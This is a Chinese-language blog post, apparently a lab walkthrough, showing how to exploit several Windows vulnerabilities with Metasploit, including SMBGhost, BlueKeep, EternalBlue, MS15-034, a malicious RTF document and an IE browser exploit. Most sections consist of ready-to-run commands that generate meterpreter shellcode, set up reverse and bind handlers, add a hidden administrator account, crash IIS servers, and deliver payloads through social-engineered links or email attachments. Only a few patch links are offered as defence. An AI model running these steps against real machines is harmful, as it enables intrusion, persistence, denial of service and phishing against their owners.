09-30 09:34 阅读 429

Metasploit之windows操作系统常见漏洞

版本由高到低依次开车

1:永恒之蓝 2.0 <CVE-2020-0796>

解说: 永恒之蓝 2.0 来了，基于 SMBv3 的漏洞,windows88和Windows Server 2012 - Windows 10 最新版全部中招 ,在微软发布修补CVE-2020-0796漏洞的安全更新之前，Cisco Talos分享了通过禁用SMBv3压缩和拦截计算机的445端口来防御利用该漏洞发起的攻击。

- 复现

一、环境准备

目标机：windows10 1903 x64 ip：192.168.17.205 （关闭防火墙）
攻击机：kali ip：192.168.17.190

二、漏洞检测

利用POC检测：
检测工具：https://github.com/ollypwn/SMBGhost

image.png

三、漏洞攻击-蓝屏

POC下载：https://github.com/eerykitty/CVE-2020-0796-PoC

image.png

四、漏洞利用-getshell

脚本下载：https://github.com/chompie1337/SMBGhost_RCE_PoC
msfvenom生成正向连接木马

有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

用生成的shellcode将exploit.py中的这一部分替换掉（buf后的字符串，保留USER_PAYLOAD不变）

image.png

开启msf监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444//监听端口
set rhost 192.168.17.205 //目标主机
run

运行exploit.py脚本，反弹shell
按道理来说，这里反弹了一个shell的可能出现反弹不了,win10的内存调整到4个G以上

image.png

OK,成功 getshell

image.png

技巧,winver查看系统版本

image.png

2:远程3389（CVE-2019-0708）与MS12-020

远程漏洞: 受影响Windows系统版本：Windows7 Windows Server 2008 R2 Windows Server 2008
Windows 2003 Windows XP , 部分攻击直接导致蓝屏也有些部分直接返回shell,根据系统硬件所支持

- 复现

一、环境准备

目标机：windows7
攻击机：kali ip：192.168.17.190
受影响的版本

image.png

二、进行攻击：

使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 启用 0708RDP 攻击模块
使用 show options 查看相关信息和设置
关键设置主要为 RHOSTS / RPORT / target

set RHOSTS 受害机IP设置受害机IP
set RPORT 受害机PORT设置受害机RDP端口号
set target ID数字(可选为0-4)设置受害机机器架构
使用的是VMware，那么 target 2 满足条件
使用 exploit 开始攻击，等待建立连接

image.png

建立连接以后，使用shell获得shell

image.png

修复方法：微软已经于2019年05月4日发布了漏洞补丁，请进行相关升级：https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下链接下载补丁：https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

3网络服务器攻击渗透测试（MS17-010）

永恒之蓝了,经典了

- 复现

一、环境准备

win7一台

二、进行攻击：

找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue

image.png

输入show options 查看和配置RHOST（靶机）和LHOST（操作机）
由于我用的是虚拟电脑所以我环境已经配置好了。
如果你不知道那台电脑有漏洞你可以输入set LHOSTS 网关/24
如果是[+]前面是这样说明有漏洞，然后再set RHOST +IP。

image.png

设置TCP连接(新版本kali已经做好了这步) set payload windows/x64/meterpreter/reverse_tcp

image.png

run或exploit进行攻击

输入shell进入对方机器增加用户
以创建用户 net user test 1234 /add（xxxx用户名 1234密码）
net localgroup administrators test /add （将用户设置为管理员权限）

image.png

上传文件执行

image.png

4 : CVE-2015-1635-HTTP.SYS远程执行代码漏洞（ms15-034）

利用HTTP.sys的安全漏洞，攻击者只需要发送恶意的http请求数据包，就可能远程读取IIS服务器的内存数据，或使服务器系统蓝屏崩溃 . 根据公告显示，该漏洞对服务器系统造成了不小的影响，主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

- 复现

利用ms15-034漏洞读取服务器内存数据
借助metasploit平台，截图如下：
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run

image.png

利用ms15-034漏洞进行ddos攻击
同样借助metasploit平台，截图如下：
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run

image.png

攻击开始后，win7瞬间蓝屏然后自动重启，截图如下：

image.png

漏洞修复
禁用IIS内核缓存（可能降低IIS性能）

image.png

5 : 应用软件格式渗透，利用word去渗透（MS10-087）

如果用户打开或预览特制的RTF电子邮件，则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比，将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。
低版本的word版本会出现RTF文件漏洞。

- 复现

生成文件

msf > search ms10_087
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http
msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 10.10.10.131
msf  exploit(ms10_087_rtf_pfragments_bof) > exploit

//将文档从BT5拷贝到WIN XP靶机上

root@bt:~# cp /root/.msf4/data/exploits/ms10087.rtf   /root/ms10087.rtf
msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf  exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf  exploit(handler) > exploit

6 : 浏览器攻击渗透（MS10-018）

低版本XP系统IE浏览器地址钓鱼
低版本的word版本会出现RTF文件漏洞。

- 复现

执行search ms10-018命令，搜索路径 browser浏览器的意思

image.png

执行use exploit/windows/browser/ms10_018_ie_behaviors命令。

image.png

执行show options命令，查看要设置哪些东西。

image.png

设置一下自己服务器的ip：set SRVHOST 192.168.11.111。

image.png

设置一个payload正向连接shell：
set PAYLOAD windows/meterpreter/bind_tcp
再看一下我们这个payload的选项配置：show options 一下

image.png

为了便于大家的识别我们把端口进行修改下：set LPORT 4441

image.png

run一下，会有一个url的地址，这个地址就是要通过社工等方法让目标机进行访问。

image.png

我们让目标机访问下这个url，这时msfconsole中就出现了successfuully，我们按回车（这里我尝试了好久，每次靶机访问IE就跳出OD来，最后把靶机里面的OD删掉就好了）。

image.png

我们看下sessions。

image.png

我们进入这个会话sessions -i 1（i就是in进入的意思，1就是会话的ID）。

image.png

成功进入

image.png

7 : 网络服务器攻击渗透（MS08-067）

网络攻击渗透模块了,影响的版本 win2000/xp/2008.2003

- 复现

search ms08-067
use x
set rhost xxx.xxx.xx.xx
run
sucss then.......
shell....

............................................................bye

作者:表弟_十七

原文链接:https://www.jianshu.com/p/92ac787d0168